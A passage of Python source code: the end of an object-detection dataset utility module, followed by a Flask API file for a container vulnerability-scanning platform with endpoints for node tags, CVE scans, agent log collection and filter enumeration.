# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../coco128/'): # from utils.datasets import *; extract_boxes('../coco128')
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in img_formats:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../coco128', weights=(0.9, 0.1, 0.0)): # from utils.datasets import *; autosplit('../coco128')
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
# Arguments
path: Path to images directory
weights: Train, val, test weights (list)
"""
path = Path(path) # images dir
files = list(path.rglob('*.*'))
n = len(files) # number of files
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path / x).unlink() for x in txt if (path / x).exists()] # remove existing
for i, img in tqdm(zip(indices, files), total=n):
if img.suffix[1:] in img_formats:
with open(path / txt[i], 'a') as f:
f.write(str(img) + '\n') # add image to txt file
|
resource_api.py
|
from flask import Blueprint, request
from flask_jwt_extended import jwt_required, get_jwt_identity
from models.node_tags import NodeTags
from models.scheduler import Scheduler
from models.container_image_registry import RegistryCredential
from models.user import User, Role
from flask import current_app
from utils.response import set_response
from utils.decorators import non_read_only_user, admin_user_only
from utils.custom_exception import InternalError, InvalidUsage, DFError, Forbidden
from utils.helper import websocketio_channel_name_format, get_random_string, mkdir_recursive, rmdir_recursive
import json
from utils import resource
from resource_models.node import Node
from utils import constants
from croniter import croniter
from utils.esconn import ESConn
from utils.constants import ES_TERMS_AGGR_SIZE
import urllib.parse
import requests
from config.redisconfig import redis
import subprocess
import os
from copy import deepcopy
from flask import send_from_directory
import multiprocessing
from utils.node_utils import NodeUtils
import time
import eventlet
resource_api = Blueprint("resource_api", __name__)
@resource_api.route("/node/<path:node_id>/" + constants.NODE_ACTION_ADD_TAGS, methods=["POST"],
endpoint="api_v1_5_add_tags")
@jwt_required
@non_read_only_user
def add_tags(node_id):
"""
Node Control API - Add User Defined Tags
---
tags:
- Node Control
security:
- Bearer: []
operationId: addUserDefinedTags
description: Add given tags to this node (Applicable node type - `host`, `container`, `container_image`)
parameters:
- in: path
name: node_id
description: Node ID (refer enumerate api)
type: string
- in: body
name: Options
description: Add tags to this node for easy identification
schema:
type: object
properties:
user_defined_tags:
type: array
example: [prod, dev]
uniqueItems: true
default: []
description: Add tags to this node for easy identification
items:
type: string
example: dev
responses:
200:
description: Request success
properties:
data:
type: string
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
if not request.is_json:
raise InvalidUsage("Missing JSON post data in request")
node = Node.get_node(node_id, request.args.get("scope_id", None), request.args.get("node_type", None))
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER or \
node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
post_data = request.json
if not post_data:
post_data = {}
tags = post_data.get('user_defined_tags', [])
if type(tags) != list:
raise InvalidUsage("user_defined_tags must be of list type")
tmp_tags = []
for tag in tags:
if tag:
tmp_tags.append(tag)
tags = tmp_tags
if not tags:
raise InvalidUsage("user_defined_tags must be of list type")
set_node_tags_in_db(node, tags, "add_tags")
return set_response(data=node.set_tags(tags, "add_user_defined_tags"))
else:
raise InvalidUsage(
"Control '{0}' not applicable for node type '{1}'".format(constants.NODE_ACTION_ADD_TAGS, node.type))
except DFError as err:
current_app.logger.error("NodeView: action={}; error={}".format(constants.NODE_ACTION_ADD_TAGS, err))
raise InvalidUsage(err.message)
except Exception as ex:
raise InternalError(str(ex))
def set_node_tags_in_db(node, tags, action):
node_name = ""
present_tags = []
node_tag = None
node_tags_list = []
image_parent_host_names = []
if node.type == constants.NODE_TYPE_HOST:
node_name = node.host_name
node_tag = NodeTags.query.filter_by(host_name=node.host_name, node_name=node_name,
node_type=node.type).one_or_none()
if node_tag:
present_tags = str(node_tag.tags).split(",")
if node.type == constants.NODE_TYPE_CONTAINER:
node_name = node.docker_container_id
node_tag = NodeTags.query.filter_by(host_name=node.host_name, node_name=node_name,
node_type=node.type).one_or_none()
if node_tag:
present_tags = str(node_tag.tags).split(",")
elif node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
node_name = node.image_name_tag
for parent in node.node_details_formatted.get("parents", []):
if parent.get("type", "") == constants.NODE_TYPE_HOST and parent.get("label", ""):
image_parent_host_names.append(parent["label"])
node_tags_list = NodeTags.query.filter(NodeTags.host_name.in_(image_parent_host_names),
NodeTags.node_name == node_name, NodeTags.node_type == node.type).all()
if node_tags_list:
present_tags = str(node_tags_list[0].tags).split(",")
if action == "add_tags":
present_tags.extend(tags)
present_tags = list(set(present_tags))
elif action == "delete_tags":
for tag in tags:
if tag in present_tags:
present_tags.remove(tag)
if present_tags:
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER:
if not node_tag:
node_tag = NodeTags(host_name=node.host_name, node_name=node_name, node_type=node.type)
node_tag.tags = ",".join(present_tags)
node_tag.save()
elif node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
host_node_tag_map = {node_tag.host_name: node_tag for node_tag in node_tags_list}
for parent_host_name in image_parent_host_names:
if parent_host_name in host_node_tag_map:
node_tag = host_node_tag_map[parent_host_name]
node_tag.tags = ",".join(present_tags)
node_tag.save()
else:
node_tag = NodeTags(host_name=parent_host_name, node_name=node_name, node_type=node.type)
node_tag.tags = ",".join(present_tags)
node_tag.save()
else:
if node_tag:
node_tag.delete()
if node_tags_list:
for node_tag in node_tags_list:
node_tag.delete()
@resource_api.route("/node/<path:node_id>/" + constants.NODE_ACTION_DELETE_TAGS, methods=["POST"],
endpoint="api_v1_5_delete_tags")
@jwt_required
@non_read_only_user
def delete_tags(node_id):
"""
Node Control API - Delete User Defined Tags
---
tags:
- Node Control
security:
- Bearer: []
operationId: deleteUserDefinedTags
description: Delete given tags from this node (Applicable node type - `host`, `container`, `container_image`)
parameters:
- in: path
name: node_id
description: Node ID (refer enumerate api)
type: string
- in: body
name: Options
description: Delete given tags from this node
schema:
type: object
properties:
user_defined_tags:
type: array
example: [prod, dev]
uniqueItems: true
default: []
description: Delete given tags from this node
items:
type: string
example: dev
responses:
200:
description: Request success
properties:
data:
type: string
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
if not request.is_json:
raise InvalidUsage("Missing JSON post data in request")
node = Node.get_node(node_id, request.args.get("scope_id", None), request.args.get("node_type", None))
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER or \
node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
post_data = request.json
if not post_data:
post_data = {}
tags = post_data.get('user_defined_tags', [])
if type(tags) != list:
raise InvalidUsage("user_defined_tags must be of list type")
tmp_tags = []
for tag in tags:
if tag:
tmp_tags.append(tag)
tags = tmp_tags
if not tags:
raise InvalidUsage("user_defined_tags must be of list type")
set_node_tags_in_db(node, tags, "delete_tags")
return set_response(data=node.set_tags(tags, "delete_user_defined_tags"))
else:
raise InvalidUsage(
"Control '{0}' not applicable for node type '{1}'".format(constants.NODE_ACTION_DELETE_TAGS, node.type))
except DFError as err:
current_app.logger.error("NodeView: action={}; error={}".format(constants.NODE_ACTION_DELETE_TAGS, err))
raise InvalidUsage(err.message)
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/node/<path:node_id>/" + constants.NODE_ACTION_CVE_SCAN_START, methods=["POST"],
endpoint="api_v1_5_start_cve")
@jwt_required
@non_read_only_user
def start_cve(node_id):
"""
Node Control API - Start CVE
---
tags:
- Vulnerability Management
security:
- Bearer: []
operationId: startCVE
description: Start CVE on a node (Applicable node type - `host`, `container`, `container_image`)
parameters:
- in: path
name: node_id
description: Node ID (refer enumerate api)
type: string
- in: body
name: Options
description: Options to start cve
schema:
type: object
properties:
scan_type:
type: array
uniqueItems: true
description: Base and language specific scan types
example: ["base"]
items:
type: string
enum: [base, java, python, ruby, php, nodejs, js, dotnet]
responses:
200:
description: Request success
properties:
data:
type: string
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
post_data = {}
if request.is_json:
post_data = request.json
node = Node.get_node(node_id, request.args.get("scope_id", None), request.args.get("node_type", None))
if not node:
raise InvalidUsage("Node not found")
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER or node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
scan_types = post_data.get("scan_type", None)
if not scan_types or type(scan_types) != list:
scan_types = constants.CVE_SCAN_TYPES
else:
scan_types = list(set(scan_types + ["base"]) & set(constants.CVE_SCAN_TYPES))
scan_this_cluster = bool(post_data.get("scan_this_cluster", False))
scan_this_namespace = bool(post_data.get("scan_this_namespace", False))
mask_cve_ids = post_data.get("mask_cve_ids", [])
if scan_this_cluster:
if node.type not in [constants.NODE_TYPE_HOST, constants.NODE_TYPE_CONTAINER]:
raise InvalidUsage("scan_this_cluster option available for images")
if not node.kubernetes_cluster_id:
raise InvalidUsage("scan_this_cluster option available only in kubernetes nodes")
if scan_this_namespace:
if node.type != constants.NODE_TYPE_CONTAINER:
raise InvalidUsage("scan_this_namespace option available for for containers only")
if not node.kubernetes_cluster_id:
raise InvalidUsage("scan_this_cluster option available only in kubernetes nodes")
# action/event/resources/success
node_json = node.pretty_print()
resources = [{
"scan_types": scan_types,
node_json["node_type"]: node_json,
}]
from tasks.user_activity import create_user_activity
jwt_identity = get_jwt_identity()
create_user_activity.delay(jwt_identity["id"], constants.ACTION_START, constants.EVENT_VULNERABILITY_SCAN,
resources=resources, success=True)
df_id_to_scope_id_map = {}
topology_hosts_data = {}
topology_containers_data = {}
from config.redisconfig import redis
if scan_this_cluster or scan_this_namespace:
redis_pipe = redis.pipeline()
redis_pipe.hgetall(constants.DF_ID_TO_SCOPE_ID_REDIS_KEY_PREFIX + node.type.upper())
redis_pipe.get(websocketio_channel_name_format(constants.NODE_TYPE_HOST + "?format=deepfence")[1])
redis_pipe.get(websocketio_channel_name_format(constants.NODE_TYPE_CONTAINER + "?format=deepfence")[1])
redis_resp = redis_pipe.execute()
df_id_to_scope_id_map = redis_resp[0]
if redis_resp[1]:
topology_hosts_data = json.loads(redis_resp[1])
if redis_resp[2]:
topology_containers_data = json.loads(redis_resp[2])
if scan_this_cluster:
node_list = []
redis_lock_keys = []
redis_pipe = redis.pipeline()
# Scan all hosts in the cluster
for host_node_id, host_details in topology_hosts_data.items():
if host_details.get("kubernetes_cluster_id") == node.kubernetes_cluster_id:
try:
host_node = Node(host_node_id, df_id_to_scope_id_map=df_id_to_scope_id_map,
topology_data_df_format=topology_hosts_data)
lock_key = "{0}:{1}".format(constants.NODE_ACTION_CVE_SCAN_START, host_node.host_name)
redis_pipe.incr(lock_key)
node_list.append(host_node)
redis_lock_keys.append(lock_key)
except:
pass
# Scan all container images in the cluster
image_scan_started = []
for container_node_id, container_details in topology_containers_data.items():
if container_details.get("kubernetes_cluster_id") == node.kubernetes_cluster_id \
and container_details.get("image_name_with_tag"):
if container_details["image_name_with_tag"] in image_scan_started:
continue
try:
container_node = Node(container_node_id, df_id_to_scope_id_map=df_id_to_scope_id_map,
topology_data_df_format=topology_containers_data)
lock_key = "{0}:{1}".format(constants.NODE_ACTION_CVE_SCAN_START,
container_node.image_name_tag)
redis_pipe.incr(lock_key)
node_list.append(container_node)
redis_lock_keys.append(lock_key)
image_scan_started.append(container_details["image_name_with_tag"])
except:
pass
redis_resp = redis_pipe.execute()
for i, tmp_node in enumerate(node_list):
if redis_resp[i] != 1:
continue
try:
tmp_node.cve_scan_start(scan_types)
except:
continue
time.sleep(1)
redis_pipe = redis.pipeline()
for lock_key in redis_lock_keys:
redis.delete(lock_key)
redis_pipe.execute()
return set_response(data=True)
elif scan_this_namespace:
node_list = []
redis_lock_keys = []
redis_pipe = redis.pipeline()
image_scan_started = []
current_namespace = node.container_name.split("/")[0]
for container_node_id, container_details in topology_containers_data.items():
if container_details.get("kubernetes_cluster_id") == node.kubernetes_cluster_id \
and container_details.get("image_name_with_tag") \
and container_details.get("container_name"):
if container_details["image_name_with_tag"] in image_scan_started:
continue
k8s_namespace = container_details["container_name"].split("/")[0]
if k8s_namespace != current_namespace:
continue
try:
container_node = Node(container_node_id, df_id_to_scope_id_map=df_id_to_scope_id_map,
topology_data_df_format=topology_containers_data)
lock_key = "{0}:{1}".format(constants.NODE_ACTION_CVE_SCAN_START,
container_node.image_name_tag)
redis_pipe.incr(lock_key)
node_list.append(container_node)
redis_lock_keys.append(lock_key)
image_scan_started.append(container_details["image_name_with_tag"])
except:
pass
redis_resp = redis_pipe.execute()
for i, tmp_node in enumerate(node_list):
if redis_resp[i] != 1:
continue
try:
tmp_node.cve_scan_start(scan_types)
except:
continue
time.sleep(1)
redis_pipe = redis.pipeline()
for lock_key in redis_lock_keys:
redis.delete(lock_key)
redis_pipe.execute()
return set_response(data=True)
else:
lock_key = ""
if node.type == constants.NODE_TYPE_HOST:
lock_key = "{0}:{1}".format(constants.NODE_ACTION_CVE_SCAN_START, node.host_name)
else:
lock_key = "{0}:{1}".format(constants.NODE_ACTION_CVE_SCAN_START, node.image_name_tag)
redis_resp = redis.incr(lock_key)
if redis_resp != 1:
raise DFError("CVE scan on this node is already in progress")
resp = False
try:
resp = node.cve_scan_start(scan_types, ",".join(mask_cve_ids))
except Exception as ex:
redis.delete(lock_key)
raise ex
time.sleep(1)
redis.delete(lock_key)
return set_response(data=resp)
else:
raise InvalidUsage(
"Control '{0}' not applicable for node type '{1}'".format(constants.NODE_ACTION_CVE_SCAN_START,
node.type))
except DFError as err:
current_app.logger.error("NodeView: action={}; error={}".format(constants.NODE_ACTION_CVE_SCAN_START, err))
raise InvalidUsage(err.message)
except Exception as ex:
# import traceback
# track = traceback.format_exc()
# print(track)
raise InternalError(str(ex))
@resource_api.route("/get_logs", methods=["POST"], endpoint="api_v1_5_get_logs_from_agents")
@jwt_required
@admin_user_only
def get_logs_from_agents():
"""
API to get the agent logs
"""
payloads = request.json
node_id_list = payloads.get('node_id_list', None)
if not node_id_list:
raise InvalidUsage("node_id_list must not be empty")
if type(node_id_list) != list:
raise InvalidUsage("node_id_list must be list of node ids")
node_type = payloads.get('node_type', None)
if node_type != "host":
raise InvalidUsage("node_type must be host")
topology_data_df_format = {}
try:
redis_pipe = redis.pipeline()
redis_pipe.hgetall(constants.DF_ID_TO_SCOPE_ID_REDIS_KEY_PREFIX + node_type.upper())
redis_pipe.get(websocketio_channel_name_format(node_type + "?format=deepfence")[1])
redis_resp = redis_pipe.execute()
df_id_to_scope_id_map = redis_resp[0]
if redis_resp[1]:
topology_data_df_format = json.loads(redis_resp[1])
if not topology_data_df_format:
raise DFError("No agents data available")
except Exception as e:
raise InvalidUsage(e)
random_string = get_random_string(10)
download_path = os.path.join("/tmp/deepfence-logs-download", random_string)
mkdir_recursive(download_path)
zip_path = os.path.join("/tmp/deepfence-logs", random_string)
mkdir_recursive(zip_path)
def get_logs_from_agents_task(node_id):
try:
eventlet.monkey_patch()
node = Node(node_id, df_id_to_scope_id_map=df_id_to_scope_id_map,
topology_data_df_format=topology_data_df_format)
applicable_scans_api_url = constants.SCOPE_HOST_API_CONTROL_URL.format(
probe_id=node.probe_id, host_name=node.host_name, action="get_logs_from_agent")
with eventlet.Timeout(10):
resp = requests.post(applicable_scans_api_url, data='{}', verify=False)
response_data = resp.json()
if resp.status_code != 200:
raise InvalidUsage("Error: could not get logs from agent")
for single_file_info in response_data["agent_logs"]:
host_download_path = os.path.join(download_path, node.host_name)
mkdir_recursive(host_download_path)
f = open(os.path.join(host_download_path, single_file_info["file_name"]), "w+")
f.write(single_file_info["data"])
f.close()
except:
pass
processes = []
num_of_thread = 20
def chunks(l, n):
for i in range(0, len(l), n):
yield l[i:i + n]
for node_id in node_id_list:
p = multiprocessing.Process(target=get_logs_from_agents_task, args=(node_id,))
processes.append(p)
try:
for i in chunks(processes, num_of_thread):
for j in i:
j.start()
for j in i:
j.join()
except Exception as e:
raise InvalidUsage(e)
if not os.listdir(download_path):
raise InvalidUsage("logs has not been generated")
subprocess.run("tar -C {0} -zcvf {1}/deepfence-agent-logs.tar.gz .".format(download_path, zip_path), shell=True)
rmdir_recursive(download_path)
# from tasks.reaper_tasks import delete_old_agent_logs
# delete_old_agent_logs.delay(zip_path)
return send_from_directory(zip_path, filename="deepfence-agent-logs.tar.gz", as_attachment=True), 200
@resource_api.route("/node/<path:node_id>/" + constants.NODE_ACTION_CVE_SCAN_STOP, methods=["POST"],
endpoint="api_v1_5_stop_cve")
@jwt_required
@non_read_only_user
def stop_cve(node_id):
"""
Node Control API - Stop CVE
---
tags:
- Vulnerability Management
security:
- Bearer: []
operationId: stopCVE
description: Stop CVE on a node (Applicable node type - `host`, `container`, `container_image`)
parameters:
- in: path
name: node_id
description: Node ID (refer enumerate api)
type: string
responses:
200:
description: Request success
properties:
data:
type: string
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
node = Node.get_node(node_id, request.args.get("scope_id", None), request.args.get("node_type", None))
if not node:
raise InvalidUsage("Node not found")
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER or node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
# action/event/resources/success
node_json = node.pretty_print()
resources = [{
node_json["node_type"]: node_json,
}]
from tasks.user_activity import create_user_activity
jwt_identity = get_jwt_identity()
create_user_activity.delay(jwt_identity["id"], constants.ACTION_STOP, constants.EVENT_VULNERABILITY_SCAN,
resources=resources, success=True)
return set_response(data=node.cve_scan_stop())
else:
raise InvalidUsage(
"Control '{0}' not applicable for node type '{1}'".format(constants.NODE_ACTION_CVE_SCAN_STOP,
node.type))
except DFError as err:
current_app.logger.error("NodeView: action={}; error={}".format(constants.NODE_ACTION_CVE_SCAN_STOP, err))
raise InvalidUsage(err.message)
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/node/<path:node_id>/" + constants.NODE_ACTION_CVE_SCAN_STATUS, methods=["GET"],
endpoint="api_v1_5_cve_status")
@jwt_required
def cve_status(node_id):
"""
Node Control API - CVE Status
---
tags:
- Vulnerability Management
security:
- Bearer: []
operationId: cveStatus
description: CVE Status for a node (Applicable node type - `host`, `container`, `container_image`)
parameters:
- in: path
name: node_id
description: Node ID (refer enumerate api)
type: string
responses:
200:
description: Request success
properties:
data:
type: string
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
node = Node.get_node(node_id, request.args.get("scope_id", None), request.args.get("node_type", None))
if not node:
raise InvalidUsage("Node not found")
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER or node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
return set_response(data=node.get_cve_status())
else:
raise InvalidUsage(
"Control '{0}' not applicable for node type '{1}'".format(constants.NODE_ACTION_CVE_SCAN_STATUS,
node.type))
except DFError as err:
current_app.logger.error("NodeView: action={}; error={}".format(constants.NODE_ACTION_CVE_SCAN_STATUS, err))
raise InvalidUsage(err.message)
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/node/<path:node_id>/" + constants.NODE_ATTACK_PATH, methods=["GET"],
endpoint="api_v1_5_attack_path")
@jwt_required
def get_attack_path(node_id):
try:
node = Node.get_node(node_id, request.args.get("scope_id", None), request.args.get("node_type", None))
if not node:
raise InvalidUsage("Node not found")
if node.type == constants.NODE_TYPE_HOST or node.type == constants.NODE_TYPE_CONTAINER or \
node.type == constants.NODE_TYPE_CONTAINER_IMAGE:
return set_response(data=node.get_attack_path())
else:
raise InvalidUsage(
"Control '{0}' not applicable for node type '{1}'".format(constants.NODE_ATTACK_PATH, node.type))
except DFError as err:
current_app.logger.error("NodeView: action={}; error={}".format(constants.NODE_ATTACK_PATH, err))
raise InvalidUsage(err.message)
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/node/<node_id>", methods=["GET"], endpoint="api_v1_5_node_details")
@jwt_required
def get_node_detail(node_id):
"""
Node Details API
---
tags:
- Node Control
security:
- Bearer: []
operationId: nodeDetails
description: Get full details of a node (hosts, containers, images, processes) by node_id
parameters:
- in: path
name: node_id
description: Node ID (refer enumerate api)
type: string
responses:
200:
description: Request success
properties:
data:
type: object
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
try:
node = Node(node_id)
return set_response(node.node_details_formatted)
except Exception as ex:
raise InternalError(str(ex))
@resource_api.route("/enumerate_filters", methods=["GET"], endpoint="api_v1_5_enumerate_filters")
@jwt_required
def enumerate_node_filters():
"""
Enumerate Filters API
---
tags:
- Enumerate
security:
- Bearer: []
operationId: enumerateFilters
description: Get filter options for enumerate nodes api
parameters:
- name: node_type
in: query
type: string
required: true
description: Node type
enum: [host, container, container_image, container_by_name, process, process_by_name, pod, kube_controller, kube_service, swarm_service]
- name: resource_type
in: query
type: string
required: true
description: Resource type
enum: [cve]
responses:
200:
description: Request success
properties:
data:
type: object
description: Response message
error:
type: string
description: Error message, if any. Otherwise `null`
success:
type: boolean
description: Success status
enum: [true, false]
400:
description: Bad request
401:
description: Unauthorized
"""
# number, time_unit, lucene_query_string => used in vulnerability filters, not topology
number = request.args.get("number")
time_unit = request.args.get("time_unit")
if bool(number is not None) ^ bool(time_unit):
raise InvalidUsage("Require both number and time_unit or ignore both of them.")
if number:
try:
number = int(number)
except ValueError:
raise InvalidUsage("Number should be an integer value.")
if time_unit and time_unit not in constants.TIME_UNIT_MAPPING.keys():
raise InvalidUsage("time_unit should be one of these, month/day/hour/minute")
lucene_query_string = request.args.get("lucene_query")
if lucene_query_string:
lucene_query_string = urllib.parse.unquote(lucene_query_string)
node_types_str = str(request.args.get("node_type", ''))
node_types = []
if node_types_str:
node_types = node_types_str.split(",")
filters_needed = request.args.get("filters", None)
resource_types_str = str(request.args.get('resource_type', ''))
resource_types = []
if resource_types_str:
resource_types = resource_types_str.split(",")
resource_filters = []
for resource_type in resource_types:
if resource_type not in [constants.CVE_INDEX]:
print('Invalid resource_type {}. Skipping'.format(resource_type))
continue
if resource_type == constants.CVE_INDEX:
# Get `container` info from `cve` and `host` / `container_image` data from `cve-scan`
cve_aggs = {"cve_container_name": {
"terms": {"field": "cve_container_name.keyword", "size": constants.ES_TERMS_AGGR_SIZE}}}
cve_filters = {"type": constants.CVE_INDEX}
cve_aggs_query = ESConn.aggregation_helper(
constants.CVE_INDEX, cve_filters, cve_aggs, number,
constants.TIME_UNIT_MAPPING.get(time_unit), lucene_query_string, get_only_query=True)
cve_scan_aggs = {
"node_type": {
"terms": {"field": "node_type.keyword", "size": 10},
"aggs": {"node_id": {"terms": {"field": "node_id.keyword", "size": ES_TERMS_AGGR_SIZE}},
"node_status": {"terms": {"field": "action.keyword", "size": ES_TERMS_AGGR_SIZE}}}
}
}
cve_scan_aggs_query = ESConn.aggregation_helper(
constants.CVE_SCAN_LOGS_INDEX, {"action": ["COMPLETED", "ERROR"]}, cve_scan_aggs, number,
constants.TIME_UNIT_MAPPING.get(time_unit), lucene_query_string, add_masked_filter=False,
get_only_query=True)
search_queries = [
{"index": constants.CVE_INDEX}, cve_aggs_query,
{"index": constants.CVE_SCAN_LOGS_INDEX}, cve_scan_aggs_query
]
aggs_responses = ESConn.msearch(search_queries).get("responses", [])
filters_actions = []
filters_host_name = []
filters_container_name = []
filters_image_name = []
for container_bkt in aggs_responses[0].get("aggregations", {}).get(
"cve_container_name", {}).get("buckets", []):
if container_bkt["key"] and container_bkt["key"] not in filters_container_name:
filters_container_name.append(container_bkt["key"])
for node_type_bkt in aggs_responses[1].get("aggregations", {}).get("node_type", {}).get("buckets", []):
for node_id_bkt in node_type_bkt.get("node_id", {}).get("buckets", []):
if node_type_bkt["key"] == constants.NODE_TYPE_HOST:
if node_id_bkt["key"] and node_id_bkt["key"] not in filters_host_name:
filters_host_name.append(node_id_bkt["key"])
elif node_type_bkt["key"] == constants.NODE_TYPE_CONTAINER_IMAGE:
if node_id_bkt["key"] and node_id_bkt["key"] not in filters_image_name:
filters_image_name.append(node_id_bkt["key"])
for scan_action_bkt in node_type_bkt.get("node_status", {}).get("buckets", []):
if scan_action_bkt["key"] and scan_action_bkt["key"] not in filters_actions:
filters_actions.append(scan_action_bkt["key"])
if filters_host_name:
details = {"label": "Hostname", "name": "host_name", "options": filters_host_name, "type": "string"}
if node_types:
if constants.NODE_TYPE_HOST in node_types:
resource_filters.append(details)
else:
resource_filters.append(details)
if filters_image_name:
details = {"label": "Image Name", "name": "image_name_with_tag", "options": filters_image_name,
"type": "string"}
if node_types:
if constants.NODE_TYPE_CONTAINER_IMAGE in node_types:
resource_filters.append(details)
else:
resource_filters.append(details)
if filters_container_name:
details = {"label": "Container Name", "name": "container_name", "options": filters_container_name,
"type": "string"}
if node_types:
if constants.NODE_TYPE_CONTAINER in node_types:
resource_filters.append(details)
else:
resource_filters.append(details)
if filters_actions:
details = {"label": "Status", "name": "action", "options": filters_actions, "type": "string"}
resource_filters.append(details)
node_types = [constants.NODE_TYPE_HOST]
filters_needed = "kubernetes_cluster_name"
if filters_needed:
filters_needed = str(filters_needed).split(",")
if not node_types:
raise InvalidUsage("node_type is required")
filter_keys = []
for node_type in node_types:
if node_type not in constants.NODE_TYPES_ALL:
raise InvalidUsage("node_type '{0}' is invalid".format(node_type))
if node_type == constants.NODE_TYPE_REGISTRY_IMAGE:
registry_id = request.args.get("registry_id")
if not registry_id:
raise InvalidUsage("registry_id is required")
filter_keys.append("{0}{1}:{2}".format(constants.TOPOLOGY_FILTERS_PREFIX, node_type.upper(), registry_id))
else:
filter_keys.append(constants.TOPOLOGY_FILTERS_PREFIX + node_type.upper())
from config.redisconfig import redis
topology_filters = redis.mget(filter_keys)
response = {"filters": []}
added_filters = {}
added_count = 0
for topology_filter in topology_filters:
if not topology_filter:
continue
filter_items = json.loads(topology_filter)
for item in filter_items:
to_add = False
if filters_needed:
if item["name"] in filters_needed:
to_add = True
else:
to_add = True
if to_add:
if item["name"] in added_filters:
found_index = added_filters[item["name"]]
tmp_options = list(set(item["options"] + response["filters"][found_index]["options"]))
response["filters"][found_index]["options"] = tmp_options
else:
response["filters"].append(item)
added_filters[item["name"]] = added_count
added_count += 1
merged_filters = []
# if node_types are passed remove filters generated by resource_type which are not applicable to node_types
if resource_filters and response.get('filters'):
merged_filters = resource_filters + response.get('filters')
# merged_filters = list(filter(lambda x: x.get('name') in [y.get('name') for y in response.get('filters')],
# resource_filters))
elif node_types and response.get('filters'):
